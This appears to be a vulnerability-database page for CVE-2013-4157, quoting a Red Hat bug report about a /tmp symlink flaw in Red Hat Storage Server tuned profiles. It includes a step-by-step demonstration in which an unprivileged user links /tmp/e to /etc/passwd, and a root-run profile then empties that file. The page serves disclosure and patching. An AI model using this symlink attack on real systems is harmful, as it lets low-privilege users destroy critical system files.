CVE-2013-4157
First published: Sat Jul 20 2013(Updated: )
Gowrishankar Rajaiyan (grajaiya) reports: I found a potential security issue with redhat-storage-server-1.7.3-2.el6rhs.noarch previously known as appliance-base-1.7.3-1.el6rhs while verifying <a class="bz_bug_link bz_secure " title="" href="show_bug.cgi?id=910566">https://bugzilla.redhat.com/show_bug.cgi?id=910566</a>. [Open URL] This issue also exists in the latest released version of RHS <a href="https://rhn.redhat.com/rhn/software/channel/downloads/Download.do?cid=14689">https://rhn.redhat.com/rhn/software/channel/downloads/Download.do?cid=14689</a> [Open URL] Description: As part of /etc/tune-profiles/rhs-high-throughput/ktune.sh and /etc/tune-profiles/rhs-virtualization/ktune.sh <snip> for d in `find /var/lib/glusterd/vols -name bricks -type d 2>/tmp/e ` ; do </snip> A file "e" is created in /tmp directory. This information is public at <a class="bz_bug_link bz_secure " title="" href="show_bug.cgi?id=910566#c13">https://bugzilla.redhat.com/show_bug.cgi?id=910566#c13</a> [Open URL] (I set it to private now, not sure if that helps). So any normal user can create a softlink from /tmp/e to /etc/passwd. The tuned profiles are executed as root user, hence, exposes a security loop hole where in a normal user can wipe out /etc/passwd. Please guide on how to proceed from here. A demonstration is as follows: As normal user: [shanks@localhost ~]$ id uid=500(shanks) gid=500(shanks) groups=500(shanks) [shanks@localhost ~]$ cd /tmp/ [shanks@localhost tmp]$ ln -s /etc/passwd e [shanks@localhost tmp]$ ls -l total 4 lrwxrwxrwx 1 shanks shanks 11 Jul 19 12:49 e -> /etc/passwd -rwx------. 1 root root 391 Jul 19 09:04 ks-script-QuMjt3 -rwxr-xr-x. 1 root root 0 Jul 19 09:04 ks-script-QuMjt3.log -rw------- 1 root root 0 Jul 19 09:04 tmp.ta4401DZd7 -rw-------. 1 root root 0 Jul 19 08:54 yum.log [shanks@localhost tmp]$ As root: [root@localhost ~]# tuned-adm profile rhs-high-throughput Reverting to saved sysctl settings: [ OK ] Calling '/etc/ktune.d/tunedadm.sh stop': setting readahead to 128 on brick devices: [ OK ] Reverting to cfq elevator: dm-0 dm-1 [ OK ] Stopping tuned: [ OK ] Switching to profile 'rhs-high-throughput' Applying ktune sysctl settings: /etc/ktune.d/tunedadm.conf: [ OK ] Calling '/etc/ktune.d/tunedadm.sh start': setting readahead to 65536 on brick devices: [ OK ] Applying sysctl settings from /etc/sysctl.conf Applying deadline elevator: dm-0 dm-1 [ OK ] Starting tuned: 'import site' failed; use -v for traceback [ OK ] [root@localhost ~]# cat /etc/passwd [root@localhost ~]#
Credit: secalert@redhat.com
| Affected Software | Affected Version | How to fix |
|---|---|---|
| Redhat Storage Server | =2.0 |
Never miss a vulnerability like this again
Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.
Reference Links
- http://rhn.redhat.com/errata/RHSA-2013-1205.html
- https://bugzilla.redhat.com/show_bug.cgi?id=986516
- https://bugzilla.redhat.com/show_bug.cgi/show_bug.cgi?id=910566
- https://rhn.redhat.com/rhn/software/channel/downloads/Download.do?cid=14689
- https://bugzilla.redhat.com/show_bug.cgi/show_bug.cgi?id=910566#c13
- https://rhn.redhat.com/errata/RHSA-2013-1205.html
- collector/redhat-bugzilla
- alias/CVE-2013-4157
- collector/nvd-index
- agent/references
- agent/weakness
- agent/tags
- agent/description
- agent/last-modified-date
- vendor/redhat
- canonical/redhat storage server
- version/redhat storage server/2.0